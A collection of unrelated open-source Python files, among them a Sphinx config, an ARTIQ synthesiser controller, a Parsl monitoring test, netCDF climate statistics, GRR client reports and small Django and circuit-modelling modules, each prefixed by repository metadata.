for nt in self.nts: # sum over all nonterminals
priors = priors + np.dot(np.log(self.value[nt].value), self.Counts[nt].T)
priors = priors - np.log(sum(np.exp(priors)))
pos = 0 # what response are we on?
likelihood = 0.0
for g in xrange(self.N_groups):
posteriors = self.L[g] + priors # posterior score
posteriors = np.exp(posteriors - logsumexp(posteriors)) # posterior probability
# Now compute the probability of the human data
for _ in xrange(self.GroupLength[g]):
ps = np.dot(posteriors, self.ModelResponse[pos])
likelihood += binom.logpmf(self.Nyes[pos], self.Ntrials[pos], ps)
pos = pos + 1
return likelihood
@attrmem('prior')
def compute_prior(self):
return sum([ x.compute_prior() for x in self.value.values()])
def propose(self, epsilon=1e-10):
# should return is f-b, proposal
prop = type(self)(self.Counts, self.L, self.GroupLength, self.prior_offset, self.Nyes, \
self.Ntrials, self.ModelResponse, value=deepcopy(self.value))
fb = 0.0
nt = sample1(self.nts) # which do we propose to?
prop.value[nt], fb = prop.value[nt].propose()
return prop, fb
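# Illustrative sketch with toy numbers (not part of the model): the likelihood
# loop in compute_likelihood() above normalises per-hypothesis log scores into
# a posterior and then scores the observed yes-counts with a binomial.
def _likelihood_step_sketch():
    log_scores = np.array([-1.0, -2.0, -3.0])       # hypothetical posterior scores
    posteriors = np.exp(log_scores - logsumexp(log_scores))
    model_response = np.array([1.0, 0.0, 1.0])      # each hypothesis' answer to one item
    p_yes = np.dot(posteriors, model_response)      # probability of answering "yes"
    return binom.logpmf(7, 10, p_yes)               # 7 "yes" responses out of 10 trials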
|
luanrafael/pygame-site | FlaskApp/src/views/__init__.py | Python | mit | 189 | 0 | ''''
This module is intended to contain the blueprints o | f the project
if you want more information about blue | prints, you can check out this link:
http://flask.pocoo.org/docs/blueprints/
'''
|
eevee/sanpera | doc/conf.py | Python | isc | 7,742 | 0.007492 | # -*- coding: utf-8 -*-
#
# sanpera documentation build configuration file, created by
# sphinx-quickstart2 on Sat May 12 21:24:07 2012.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.viewcode']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'sanpera'
copyright = u'2012, Eevee'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.1.0'
# The full version, including alpha/beta/rc tags.
release = '0.1.0'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each le | tter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Defau | lt is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'sanperadoc'
# -- Options for LaTeX output --------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'sanpera.tex', u'sanpera Documentation',
u'Eevee', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'sanpera', u'sanpera Documentation',
[u'Eevee'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output ------------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'sanpera', u'sanpera Documentation',
u'Eevee', 'sanpera', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
|
cjbe/artiqDrivers | artiqDrivers/frontend/rohdeSynth_controller.py | Python | gpl-3.0 | 1,342 | 0.00149 | #!/usr/bin/env python3.5
import argparse
import sys
from artiqDrivers.devices.rohdeSynth.driver import RohdeSynth, RohdeSynthSim  # RohdeSynthSim assumed to live in the same driver module
from sipyco.pc_rpc import simple_server_loop
from sipyco.common_args import simple_network_args, init_logger_from_args
from oxart.tools import add_common_args
def get_argparser():
parser = argparse.ArgumentParser(description="ARTIQ controller for the Rohde&Schwarz SMA100A synthesiser")
parser.add_argument("-i", "--ipaddr", default=None,
help="IP address of synth")
parser.add_argument("--simulation", action="store_true",
| help="Put the driver in simulation mode, even if "
"--ipaddress is used.")
simple_network_args(parser, 4004)
add_common_args( | parser)
return parser
def main():
args = get_argparser().parse_args()
init_logger_from_args(args)
if not args.simulation and args.ipaddr is None:
print("You need to specify either --simulation or -i/--ipaddr "
"argument. Use --help for more information.")
sys.exit(1)
if args.simulation:
dev = RohdeSynthSim()
else:
dev = RohdeSynth(addr=args.ipaddr)
try:
simple_server_loop({"rohdeSynth": dev}, args.bind, args.port)
finally:
dev.close()
if __name__ == "__main__":
main()
|
googleapis/python-service-management | samples/generated_samples/servicemanagement_v1_generated_service_manager_create_service_sync.py | Python | apache-2.0 | 1,564 | 0.000639 | # -*- coding: utf-8 -*-
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Generated code. DO NOT EDIT!
#
# Snippet for CreateService
# NOTE: This snippet has been auto | matically generated for illustrative purposes only.
# It may require modifications to work in your environment.
# To install the latest published package dependency, execute the following:
# python3 -m pip install google-cloud-service-management
# [START servicemanagement_v1_generated_ServiceManager_CreateService_sync]
from googl | e.cloud import servicemanagement_v1
def sample_create_service():
# Create a client
client = servicemanagement_v1.ServiceManagerClient()
# Initialize request argument(s)
request = servicemanagement_v1.CreateServiceRequest(
)
# Make the request
operation = client.create_service(request=request)
print("Waiting for operation to complete...")
response = operation.result()
# Handle the response
print(response)
# [END servicemanagement_v1_generated_ServiceManager_CreateService_sync]
|
Parsl/parsl | parsl/tests/test_monitoring/test_db_locks.py | Python | apache-2.0 | 2,848 | 0 | import logging
import os
import parsl
import pytest
import time
logger = logging.getLogger(__name__)
@parsl.python_app
def this_app():
return 5
@pytest.mark.local
def test_row_counts():
from parsl.tests.configs.htex_local_alternate import fresh_config
import sqlalchemy
if os.path.exists("runinfo/monitoring.db"):
logger.info("Monitoring database already exists - deleting")
os.remove("runinfo/monitoring.db")
engine = sqlalchemy.create_engine("sqlite:///runinfo/monitoring.db")
logger.info("loading parsl")
parsl.load(fresh_config())
# parsl.load() returns before all initialisation of monitoring
# is complete, which means it isn't safe to take a read lock on
# the database yet. This delay tries to work around that - some
# better async behaviour might be nice, but what?
#
# Taking a read lock before monitoring is initialized will cause
# a failure in the part of monitoring which creates tables, and
# which is not protected against read locks at the time this test
# was written.
time.sleep(10)
# to get an sqlite3 read lock that is held over a controllable
# long time, create a transaction and perform | a SELECT in it.
# The lock will be held until the end of the transaction.
# (see bottom of https://sqlite.org/lockingv3.html)
logger.info("Getting a read lock on the monitoring database")
| with engine.begin() as readlock_connection:
readlock_connection.execute("BEGIN TRANSACTION")
result = readlock_connection.execute("SELECT COUNT(*) FROM workflow")
(c, ) = result.first()
assert c == 1
# now readlock_connection should have a read lock that will
# stay locked until the transaction is ended, or the with
# block ends.
logger.info("invoking and waiting for result")
assert this_app().result() == 5
# there is going to be some raciness here making sure that
# the database manager actually tries to write while the
# read lock is held. I'm not sure if there is a better way
# to detect this other than a hopefully long-enough sleep.
time.sleep(10)
logger.info("cleaning up parsl")
parsl.dfk().cleanup()
parsl.clear()
# at this point, we should find data consistent with executing one
# task in the database.
logger.info("checking database content")
with engine.begin() as connection:
result = connection.execute("SELECT COUNT(*) FROM workflow")
(c, ) = result.first()
assert c == 1
result = connection.execute("SELECT COUNT(*) FROM task")
(c, ) = result.first()
assert c == 1
result = connection.execute("SELECT COUNT(*) FROM try")
(c, ) = result.first()
assert c == 1
logger.info("all done")
|
bird-house/flyingpigeon | flyingpigeon/nc_statistic.py | Python | apache-2.0 | 10,385 | 0.002215 | from flyingpigeon.nc_utils import get_values, get_coordinates, get_index_lat, get_variable
from os.path import basename, join
from datetime import datetime as dt
from shutil import copyfile
from netCDF4 import Dataset
import numpy as np
import logging
LOGGER = logging.getLogger("PYWPS")
def fieldmean(resource):
"""
    Calculation of a weighted field mean.
:param resource: str or list of str containing the netCDF files paths
:return list: timeseries of the averaged values per timestep
"""
from numpy import radians, average, cos, sqrt, array
data = get_values(resource) # np.squeeze(ds.variables[variable][:])
# dim = data.shape
| LOGGER.debug(data.shape)
if len(data.shape) == 3:
# TODO if data.shape == 2 , 4 ...
lats, lons = get_coordinates(resource, unrotate=False)
lats = array(lats)
if len(lats.shape) == 2:
lats = lats[:, 0]
else:
LOGGER.debug('Latitudes not reduced to 1D')
            # TODO: calculate the weighted average with 2D lats (rotated pole coordinates)
# lats, lons = get_coordinates(resource, unrotate=False)
# if len(lats.shape) == 2:
# lats, lons = get_coordinates(resource)
lat_index = get_index_lat(resource)
LOGGER.debug('lats dimension %s ' % len(lats.shape))
LOGGER.debug('lats index %s' % lat_index)
lat_w = sqrt(cos(lats * radians(1)))
meanLon = average(data, axis=lat_index, weights=lat_w)
meanTimeserie = average(meanLon, axis=1)
LOGGER.debug('fieldmean calculated')
else:
LOGGER.error('not 3D shaped data. Average can not be calculated')
return meanTimeserie
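# Illustrative sketch with synthetic data (not part of the module): the same
# sqrt(cos(lat)) latitude weighting as above, applied to a toy
# (time, lat, lon) array.
def _fieldmean_sketch():
    from numpy import radians, average, cos, sqrt, array, ones
    data = ones((4, 3, 5))                            # time x lat x lon
    lats = array([-45.0, 0.0, 45.0])
    lat_w = sqrt(cos(lats * radians(1)))
    mean_lon = average(data, axis=1, weights=lat_w)   # collapse the latitude axis
    return average(mean_lon, axis=1)                  # timeseries of field means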
def robustness_cc_signal(variable_mean, standard_deviation=None,
variable=None, dir_output=None):
"""
Claculating the Climate Change signal based on the output of robustness_stats.
:param variable_mean: list of two 2D spatial netCDF files
in the order of [refenence, projection]
:param standard_deviation: according to variable_mean files 2D netCDF files of the standard deviation
:return netCDF files: cc_signal.nc, mean_std.nc
"""
from os.path import join
basename_ref = basename(variable_mean[0]).split('_')
basename_proj = basename(variable_mean[1]).split('_')
# ensstd_tg_mean_1981-01-01-2010-12-31.nc'
if variable is None:
variable = get_variable(variable_mean[0])
ds = Dataset(variable_mean[0])
vals_ref = np.squeeze(ds[variable][:])
ds.close()
ds = Dataset(variable_mean[1])
vals_proj = np.squeeze(ds[variable][:])
ds.close()
if standard_deviation is not None:
ds = Dataset(standard_deviation[0])
std_ref = np.squeeze(ds[variable][:])
ds.close()
ds = Dataset(standard_deviation[1])
std_proj = np.squeeze(ds[variable][:])
ds.close()
bn_mean_std = 'mean-std_{}_{}_{}'.format(basename_ref[1], basename_ref[-2], basename_proj[-1])
out_mean_std = copyfile(standard_deviation[0], join(dir_output, bn_mean_std))
ds_median_std = Dataset(out_mean_std, mode='a')
ds_median_std[variable][:] = (std_ref + std_proj) / 2
ds_median_std.close()
else:
out_mean_std = None
bn_cc_signal = 'cc-signal_{}_{}_{}'.format(basename_ref[1], basename_ref[-2], basename_proj[-1])
out_cc_signal = copyfile(variable_mean[0], join(dir_output, bn_cc_signal))
ds_cc = Dataset(out_cc_signal, mode='a')
ds_cc[variable][:] = np.squeeze(vals_proj - vals_ref)
ds_cc.close()
return out_cc_signal, out_mean_std
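# Illustrative sketch with synthetic values (not part of the module): the
# climate change signal written above is simply "projection minus reference",
# and the combined spread is the mean of the two standard deviation fields.
def _cc_signal_sketch():
    vals_ref = np.array([[10.0, 11.0], [12.0, 13.0]])
    vals_proj = np.array([[12.5, 13.0], [13.0, 15.5]])
    std_ref = np.array([[1.0, 1.2], [0.8, 1.1]])
    std_proj = np.array([[1.4, 1.0], [1.2, 0.9]])
    cc_signal = vals_proj - vals_ref          # e.g. +2.5 in the first grid cell
    mean_std = (std_ref + std_proj) / 2
    return cc_signal, mean_std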
def robustness_stats(resources, time_range=[None, None], dir_output=None, variable=None):
"""
calculating the spatial mean and corresponding standard deviation for an ensemble
of consistent datasets containing one variableself.
If a time range is given the statistical values are calculated only in the disired timeperiod.
:param resources: str or list of str containing the netCDF files paths
:param time_range: sequence of two datetime.datetime objects to mark start and end point
:param dir_output: path to folder to store ouput files (default= curdir)
:param variable: variable name containing in netCDF file. If not set, variable name gets detected
:return netCDF files: out_ensmean.nc, out_ensstd.nc
"""
from ocgis import OcgOperations, RequestDataset, env
env.OVERWRITE = True
if variable is None:
variable = get_variable(resources[0])
out_means = []
for resource in resources:
rd = RequestDataset(resource, variable)
prefix = basename(resource).replace('.nc', '')
LOGGER.debug('processing mean of {}'.format(prefix))
calc = [{'func': 'median', 'name': variable}]
# {'func': 'median', 'name': 'monthly_median'}
ops = OcgOperations(dataset=rd, calc=calc, calc_grouping=['all'],
output_format='nc', prefix='median_'+prefix, time_range=time_range, dir_output=dir_output)
out_means.append(ops.execute())
# nc_out = call(resource=resources, calc=[{'func': 'mean', 'name': 'ens_mean'}],
# calc_grouping='all', # time_region=time_region,
# dir_output=dir_output, output_format='nc')
####
# read in numpy array
for i, out_mean in enumerate(out_means):
if i == 0:
ds = Dataset(out_mean)
var = ds[variable][:]
dims = [len(out_means), var[:].shape[-2], var[:].shape[-1]]
vals = np.empty(dims)
vals[i, :, :] = np.squeeze(var[:])
ds.close()
else:
ds = Dataset(out_mean)
vals[i, :, :] = np.squeeze(ds[variable][:])
ds.close()
####
# calc median, std
val_median = np.nanmedian(vals, axis=0)
val_std = np.nanstd(vals, axis=0)
#####
# prepare files by copying ...
ensmean_file = 'ensmean_{}_{}_{}.nc'.format(variable, dt.strftime(time_range[0], '%Y-%m-%d'),
dt.strftime(time_range[1], '%Y-%m-%d'))
out_ensmean = copyfile(out_means[0], join(dir_output, ensmean_file))
ensstd_file = 'ensstd_{}_{}_{}.nc'.format(variable, dt.strftime(time_range[0], '%Y-%m-%d'),
dt.strftime(time_range[1], '%Y-%m-%d'))
out_ensstd = copyfile(out_means[0], join(dir_output, ensstd_file))
####
# write values to files
ds_median = Dataset(out_ensmean, mode='a')
ds_median[variable][:] = val_median
ds_median.close()
ds_std = Dataset(out_ensstd, mode='a')
ds_std[variable][:] = val_std
ds_std.close()
LOGGER.info('processing the overall ensemble statistical mean ')
# prefix = 'ensmean_tg-mean_{}-{}'.format(dt.strftime(time_range[0], '%Y-%m-%d'),
# dt.strftime(time_range[1], '%Y-%m-%d'))
# rd = RequestDataset(out_means, var)
# calc = [{'func': 'mean', 'name': 'mean'}] # {'func': 'median', 'name': 'monthly_median'}
# ops = OcgOperations(dataset=rd, calc=calc, calc_grouping=['all'],
# output_format=output_format, prefix='mean_'+prefix, time_range=time_range)
# ensmean = ops.execute()
return out_ensmean, out_ensstd
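# Illustrative sketch with a synthetic ensemble (not part of the module): the
# per-grid-cell ensemble statistics above reduce to a nanmedian / nanstd over
# the member axis of a stacked array.
def _ensemble_stats_sketch():
    members = np.stack([np.full((2, 3), 10.0),
                        np.full((2, 3), 12.0),
                        np.full((2, 3), 20.0)])   # shape: (n_members, lat, lon)
    val_median = np.nanmedian(members, axis=0)    # 12.0 in every cell
    val_std = np.nanstd(members, axis=0)
    return val_median, val_std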
# call(resource=[], variable=None, dimension_map=None, agg_selection=True,
# calc=None, calc_grouping=None, conform_units_to=None, crs=None,
# memory_limit=None, prefix=None,
# regrid_destination=None, regrid_options='bil', level_range=None, # cdover='python',
# geom=None, output_format_options=None, search_radius_mult=2.,
# select_nearest=False, select_ugid=None, spatial_wrapping=None,
# t_calendar=None, time_region=None,
# time_range=None, dir_output=None, output_format='nc'):
# CDO is disabled ...
# def remove_mean_trend(fana, varname):
# """
# Removing the smooth trend from 3D netcdf file
# """
# from cdo import Cdo
# from netCDF4 import Dataset
# import uuid
# from scipy.interpolate import UnivariateSpline
# from os import s |
statik/grr | lib/aff4_objects/reports.py | Python | apache-2.0 | 8,500 | 0.007529 | #!/usr/bin/env python
"""Module containing a set of reports for management of GRR."""
import csv
import datetime
import StringIO
import time
import logging
from grr.lib import config_lib
from grr.lib import email_alerts
from grr.lib import export_utils
from grr.lib import rdfvalue
from grr.lib import registry
from grr.lib.aff4_objects import aff4_grr
from grr.lib.aff4_objects import network
class Report(object):
"""The baseclass for all reports."""
# Register a metaclass registry to track all reports.
__metaclass__ = registry.MetaclassRegistry
class ClientReport(Report):
"""The baseclass of all client reports."""
EMAIL_TEMPLATE = """
<html><body><h2>%(report_name)s</h2>
%(report_text)s
<br/>
<p>Thanks,</p>
<p>%(signature)s</p>
</body></html>"""
EMAIL_FROM = "noreply"
# List of attributes to add to the report from the / path in the client.
REPORT_ATTRS = []
# List of tuples of (path, attribute) to add to the report.
EXTENDED_REPORT_ATTRS = []
__abstract = True # pylint: disable=g-bad-name
def __init__(self, token=None, thread_num=20):
self.token = token
self.results = []
self.fields = [f.name for f in self.REPORT_ATTRS]
self.fields += [f[1].name for f in self.EXTENDED_REPORT_ATTRS]
self.thread_num = thread_num
self.broken_clients = [] # Clients that are broken or fail to run.
def AsDict(self):
"""Give the report as a list of dicts."""
if not self.results:
logging.warn("Run has not been called, no results.")
else:
return self.results
def AsCsv(self):
"""Give the report in CSV format."""
output = StringIO.StringIO()
writer = csv.DictWriter(output, self.fields)
if hasattr(writer, "writeheader"):
writer.writeheader() # requires 2.7
for val in self.results:
writer.writerow(val)
output.seek(0)
return output
def SortResults(self, field):
"""Sort the result set."""
logging.debug("Sorting %d results", len(self.results))
self.results.sort(key=lambda x: str(x.get(field, "")))
def AsHtmlTable(self):
"""Return the results as an HTML table."""
th = ["<th>%s</th>" % f for f in self.fields]
headers = "<tr>%s</tr>" % "".join(th)
rows = []
for val in self.results:
values = [val[k] for k in self.fields]
row = ["<td>%s</td>" % f for f in values]
rows.append("<tr>%s</tr>" % "".join(row))
html_out = "<table>%s%s</table>" % (headers, "\n".join(rows))
return html_out
def AsText(self):
"""Give the report as formatted text."""
output = StringIO.StringIO()
fields = self.fields
writer = csv.DictWriter(output, fields, dialect=csv.excel_tab)
for val in self.results:
writer.writerow(val)
output.seek(0)
return output
def MailReport(self, recipient, subject=None):
"""Mail the HTML report to recipient."""
dt = rdfvalue.RDFDatetime().Now().Format("%Y-%m-%dT%H-%MZ")
subject = subject or "%s - %s" % (self.REPORT_NAME, dt)
csv_data = self.AsCsv()
filename = "%s-%s.csv" % (self.REPORT_NAME, dt)
email_alerts.EMAIL_ALERTER.SendEmail(
recipient, self.EMAIL_FROM, subject,
"Please find the CSV report file attached",
attachments={filename: csv_data.getvalue()},
is_html=False)
logging.info("Report %s mailed to %s", self.REPORT_NAME, recipient)
def MailHTMLReport(self, recipient, subject=None):
"""Mail the HTML report to recipient."""
dt = rdfvalue.RDFDatetime().Now().Format("%Y-%m-%dT%H-%MZ")
subject = subject or "%s - %s" % (self.REPORT_NAME, dt)
report_text = self.AsHtmlTable()
email_alerts.EMAIL_ALERTER.SendEmail(
recipient, self.EMAIL_FROM, subject,
self.EMAIL_TEMPLATE % dict(
report_text=report_text,
report_name=self.REPORT_NAME,
signature=config_lib.CONFIG["Email.signature"]),
is_html=True)
logging.info("Report %s mailed to %s", self.REPORT_NAME, recipient)
def Run(self, max_age=60 * 60 * 24 * 7):
"""Run the report.
Args:
max_age: Maximum age in seconds of the client to include in report.
"""
pass
def _QueryResults(self, max_age):
"""Query each record in the client database."""
report_iter = ClientReportIterator(
max_age=max_age, token=self.token, report_attrs=self.REPORT_ATTRS,
extended_report_attrs=self.EXTENDED_REPORT_ATTRS)
self.broken_clients = report_iter.broken_subjects
return report_iter.Run()
class ClientListReport(ClientReport):
"""Returns a list of clients with their version."""
REPORT_ATTRS = [
aff4_grr.VFSGRRClient.SchemaCls.GetAttribute("LastCheckin"),
aff4_grr.VFSGRRClient.SchemaCls.GetAttribute("subject"),
aff4_grr.VFSGRRClient.SchemaCls.GetAttribute("Host"),
aff4_grr.VFSGRRClient.SchemaCls.GetAttribute("System"),
aff4_grr.VFSGRRClient.SchemaCls.GetAttribute("Architecture"),
aff4_grr.VFSGRRClient.SchemaCls.GetAttribute("Uname"),
aff4_grr.VFSGRRClient.SchemaCls.GetAttribute("GRR client"),
]
EXTENDED_REPORT_ATTRS = [
("network", network.Network.SchemaCls.GetAttribute("Interfaces"))
]
REPORT_NAME = "GRR Client List Report"
def Run(self, max_age=60 * 60 * 24 * 7):
"""Collect all the data for the report."""
start_time = time.time()
self.results = []
self.broken_subjects = []
for client in self._QueryResults(max_age):
self.results.append(client)
self.SortResults("GRR client")
logging.info("%s took %s to complete", self.REPORT_NAME,
datetime.timedelta(seconds=time.time() - start_time))
class VersionBreakdownReport(ClientReport):
"""Returns a breakdown of versions."""
REPORT_ATTRS = [
aff4_grr.VFSGRRClient.SchemaCls.GetAttribute("GRR client")
]
REPORT_NAME = "GRR Client Version Breakdown Report"
def Run(self, max_age=60 * 60 * 24 * 7):
"""Run the report."""
counts = {}
self.fields.append("count")
self.results = []
for client in self._QueryResults(max_age):
version = client.get("GRR client")
try:
counts[version] += 1
except KeyError:
counts[version] = 1
for version, count in counts.iteritems():
self.results.append({"GRR client": version, "count": count})
self.SortResults("count")
class ClientReportIterator(export_utils.IterateAllClients):
"""Iterate through all clients generating basic client information."""
def __init__(self, report_attrs, extended_report_attrs, **kwargs):
"""Initialize.
Args:
report_attrs: Attributes to retrieve.
extended_report_attrs: Path, Attribute tuples to retrieve.
**kwargs: Additional args to fall through to client iterator.
"""
super( | ClientReportIterator, self).__init__(**kwargs)
self.report_attrs = report_attrs
self.extended_report_attrs = extended_report_attrs
def IterFunction(self, client, out_queue, unused_token):
"""Extract report attributes."""
result = {}
for attr in self.report_attrs:
# Do some special formatting for certain fields.
if attr.name == "subject":
result[attr.name] = client.Get(attr).Basename()
elif attr.name == " | GRR client":
c_info = client.Get(attr)
if not c_info:
self.broken_subjects.append(client.client_id)
result[attr.name] = None
continue
result[attr.name] = "%s %s" % (c_info.client_name,
str(c_info.client_version))
else:
result[attr.name] = client.Get(attr)
for sub_path, attr in self.extended_report_attrs:
try:
client_sub = client.OpenMember(sub_path)
# TODO(user): Update this to use MultiOpen.
except IOError:
# If the path is not found, just continue.
continue
# Special case formatting for some attributes.
if attr.name == "Interfaces":
interfaces = client_sub.Get(attr)
if interfaces:
try:
result[attr.name] = ",".join(interfaces.GetIPAddresses())
except AttributeError:
result[attr.name] = ""
else:
result[attr.name] = client_s |
ThatSnail/impede | impede-app/server/py/wire.py | Python | mit | 2,414 | 0.000414 |
""" A component that designates a wire. """
from graph import Node, Edge
from constraint import Constraint
class Wire(object):
""" Wire component """
def __init__(self, graph, node_a=None, node_b=None, edge_i=None):
""" Initializes a wire with two nodes. Current goes from
A to B. If nodes / edges aren't supplied, new ones are created.
Supplied nodes / edges should be part of the supplied graph.
Args:
graph : Graph object
node_a : Node object
node_b : Node object
edge_i : Edge object
Returns:
Wire object
"""
| if not node_a:
node_a = Node(graph)
if not node_b:
node_b = Node(graph)
if not edge_i:
edge_i = Edge(graph, node_a, node_b)
self._node_a = node_a
self._node_b = node_b
self._edge_i = edge_i
def node_a(self):
""" Returns node A.
Returns:
Node object
"""
return self._node_a
def node_b(self):
""" | Returns node B.
Returns:
Node object
"""
return self._node_b
def edge_i(self):
""" Returns the edge that stores current from A to B.
Returns:
Edge object
"""
return self._edge_i
def substitutions(self):
""" Return a dictionary mapping each symbol to a value. Return
an empty dictionary if no substitutions exist
Returns:
dictionary from sympy variable to value
"""
return {}
def variables(self):
""" Returns a set of variables under constraints.
Returns:
set of Nodes, Edges, tuples, or strings
"""
return set([self._node_a, self._node_b, self._edge_i])
def constraints(self):
""" Returns a list of constraints that must be solved.
A constraint is a tuple (coefficients, variables), where
coefficients is a list of numbers corresponding to the linear
equation:
A_0 * x_0 + A_1 * x_1 + ... + A_{n-1} * x_{n-1} = 0,
and variables is a list of the Node and Edge objects.
Returns:
List of Constraint objects
"""
cs = [1, -1]
xs = [self._node_a, self._node_b]
constraint = Constraint(cs, xs)
return [constraint]
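# Illustrative sketch (assumes the companion graph module also exposes a Graph
# class, which is not imported above): for an ideal wire the single constraint
# [1, -1] * [V_a, V_b] = 0 just states that both end nodes share one potential.
def _wire_constraint_sketch():
    from graph import Graph   # assumed constructor with no required arguments
    graph = Graph()
    wire = Wire(graph)
    return wire.constraints()[0]   # Constraint with coefficients [1, -1]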
|
jpardobl/monscale | monscale/management/commands/trap_worker.py | Python | bsd-3-clause | 654 | 0.009174 | import l | ogging, redis, time
from django.core.management.base import BaseCommand, CommandError
from django.conf import settings
from monscale.rules import evaluate_traps
class Command(BaseCommand):
args = ''
help = 'Retrieve queued actions and execute them.'
def handle(self, *args, **options):
# logging.basicConfig(level=logging.DEBUG)
while True:
logging.debug("[trap_worker] starting loop ...")
evaluate_traps()
lo | gging.debug("[trap_worker] going to sleep for %ss" % settings.ACTION_WORKER_SLEEP_SECS)
time.sleep(settings.ACTION_WORKER_SLEEP_SECS)
|
JoeJasinski/WindyTransit | mobiletrans/mtimport/management/commands/mt_import_zipcodes.py | Python | mit | 714 | 0.007003 | import os
from django.core.management.b | ase import BaseCommand, CommandError
from django.conf import settings
from mobiletrans.mtimport.importers import importer_zipcode as importer
class Command(BaseCommand):
args = '<zipcodes.kml>'
help = 'Import Routes'
def handle(self, input_file_path="", **options):
if not input_file_path:
input_file_path = "%s" % os.path.join(settings.ENVIRONMENT_ROOT, "data", "zipcodes.kml")
self.stdout.write("Import %s \n" % input_file_path)
input_record = | importer.Zipcode.data_import(input_file_path)
print input_file_path
self.stdout.write('Import completed with status: %s\n' % input_record.get_status_display())
|
HydrelioxGitHub/home-assistant | homeassistant/components/vacuum/demo.py | Python | apache-2.0 | 10,494 | 0 | """
Demo platform for the vacuum component.
For more details about this platform, please refer to the documentation
https://home-assistant.io/components/demo/
"""
import logging
from homeassistant.components.vacuum import (
ATTR_CLEANED_AREA, SUPPORT_BATTERY, SUPPORT_CLEAN_SPOT,
